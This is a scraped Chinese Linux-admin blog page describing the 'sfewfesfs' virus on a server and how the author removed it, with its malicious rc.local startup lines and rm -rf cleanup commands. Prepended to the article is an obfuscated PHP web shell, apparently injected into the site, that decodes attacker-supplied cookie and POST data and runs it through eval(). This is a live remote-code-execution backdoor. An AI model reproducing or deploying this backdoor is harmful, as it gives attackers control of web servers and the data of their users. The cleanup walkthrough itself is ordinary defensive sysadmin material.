$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} linux 病毒 sfewfesfs | Linux运维部落

linux 病毒 sfewfesfs

由于昨天在内网服务器A不小心rm -fr / ,导致服务器A完蛋,重装系统后,不知道啥原因,局域网瘫痪不能上网,最后发现内网服务器A的一个进程sfewfesfs cpu 300%。路由器被网络阻塞啦。 于是百度这个病毒:都说该病毒很变态。第一次中linux病毒,幸亏是内网,感觉比较爽。(总结网络内容,引以为戒)

1、病毒现象

服务器不停向外网发送数据包,占网络带宽,甚至导致路由器频繁重启。
1) 通过top 或者ps -ef 发现名为sfewfesfs的进程还有.sshddXXXXXXXXXXX(一串随机数字)的进程。/etc/下能看到名为sfewfesfs,nhgbhhj等多个奇怪名字的文件。重启后一插网线立即开始执行
2)通过sar -n DEV 就可以看到往外发包的情况。
3)netstat -natlp 可以看到使用哪些端口

2、分析可能原因

曾一度怀疑是安装u盘的问题,安装盘是u盘制作的系统安装引导盘,装入系统之前是格式化了。看了网上的资料,应该不是,U盘的问题。
应该开放了服务器的ssh的22端口,并且开放ssh的远程root登陆。这个服务器又可以通过路由器代理进来,并且登陆密码也不是那么复杂。可能被黑了。
22端口的root权限还是不要开了,no zuo no die,头一次经历linux中毒曾一度以为是很安全的操作系统。

1)先看看被攻击者修改过的:/etc/rc.local文件:

cd /tmp;./sfewfesfs
cd /tmp;./gfhjrtfyhuf
cd /tmp;./rewgtf3er4t
cd /tmp;./fdsfsfvff
cd /tmp;./smarvtd
cd /tmp;./whitptabil
cd /tmp;./gdmorpen
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./fdsfsfvff
cd /etc;./smarvtd
cd /etc;./whitptabil
cd /etc;./gdmorpen
cd /tmp;./sfewfesfs
cd /tmp;./gfhjrtfyhuf
cd /tmp;./rewgtf3er4t
cd /tmp;./fdsfsfvff
cd /tmp;./smarvtd
cd /tmp;./whitptabil
cd /tmp;./gdmorpen
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./fdsfsfvff
cd /etc;./smarvtd
cd /etc;./whitptabil
cd /etc;./gdmorpen

这是修改过的内容。
这里可以看到,他启动一系列的进程,并且最后还把防火墙给你关掉了。
那现在好办了。先找到以上对应的所有文件全部删除。

2)删除病毒文件sfewfesfs

进到/etc/ 下面找到与进程对应的文件名 删掉。

sudo chattr -i /etc/sfewfesfs*  
sudo rm -rf /etc/sfewfesfs*

3) 删除.SSH2和.SSHH2

这个时候还是不行的,因为这程序启动后,会衍生出很多的进程。这个时候,找到/etc/下的.SSH2和.SSHH2删掉。之后找到/tmp/下面所有以.SSH开始的文件,全部删掉。

用ls -al看到.SSH2隐藏文件,删除

rm -rf/etc/ SSH2;
rm -rf/etc/ .SSHH2;
rm -rf/tmp/.SSH*;
/etc和/tmp可能有.sshdd1401029348隐藏文件 用ls -al看到,删除
sudo rm -rf /tmp/.sshdd140*

4)删除计划任务:

到/var/spool/cron/下面把root 和root.1删掉。
sudo rm -rf /var/spool/cron/root
sudo rm -rf /var/spool/cron/root.1
这个时候,病毒程序基本清楚完整了。

5)22端口的root权限还是不要开了:

修改外网映射22端口到XXXX
修改root密码
passwd
关闭root的22权限
在/etc/ssh/sshd_config文件中找到PermitRootLogin去掉#改成
PermitRootLogin no

5)重启服务器

转自:http://blog.csdn.net/hguisu/article/details/40652433

原创文章,作者:s19930811,如若转载,请注明出处:http://www.178linux.com/2490

(0)
上一篇 2015-04-03 22:10
下一篇 2015-04-03 22:13

相关推荐

  • 启动和内核管理

    启动和内核管理 :      CentOS 5和6的启动流程     服务管理     Grub管理     自制Linux     启动排错 &nb…

    Linux干货 2016-09-19
  • nginx

    1.Nginx的程序架构:        master/worker            一个master进程:     &nb…

    2017-06-19
  • M20-1 8月3号作业

    1、三种权限rwx对文件和目录的不同意义 2、umask和acl mask 的区别和联系 3、三种特殊权限的应用场景和作用 4、设置user1,使之新建文件权限为rw——- 5、设置/testdir/f1的权限,使user1用户不可以读写执行,g1组可以读写 /testdir/dir的权限,使新建文件自动具有acl权限:user1:r…

    Linux干货 2016-08-05
  • DNS简单配置

    正向解析,反向解析,主从, 主:主配置文件:options {        listen-on port 53 { 127.0.0.1; 172.16.252.194; };  //监听的端口,即哪些主机可以进行访问        directory   &…

    Linux干货 2017-05-24
  • select和case用法

    一、作业 1、斐波那契数列又称黄金分割数列,因数学家列昂纳多·斐波那契以兔子繁殖为例子而引入,故又称为“兔子数列”,指的是这样一个数列:0、1、1、2、3、5、8、13、21、34、……,斐波纳契数列以如下被以递归的方法定义:F(0)=0,F(1)=1,F(n)=F(n-1)+F(n-2)(n≥2) 写一个函数,求n阶斐波那契数列 2、汉诺塔(又称河内塔)问…

    Linux干货 2016-08-21
  • 计算机简介

    计算机的简介 电子计算机(英语:computer),亦称电脑,是一种利用「电子学」原理,根据一系列指令对数据进行处理的工具计算机种类繁多,但实际来看,计算机总体上是处理信息的工具。计算机在组成上形式不一,早期计算机的体积足有一间房屋的大小,而今天某些嵌入式计算机可能比一副「扑克牌」还小。当然,即使在今天依然有大量体积庞大的巨型计算机为特别的[科学]计算或面向…

    Linux干货 2016-10-28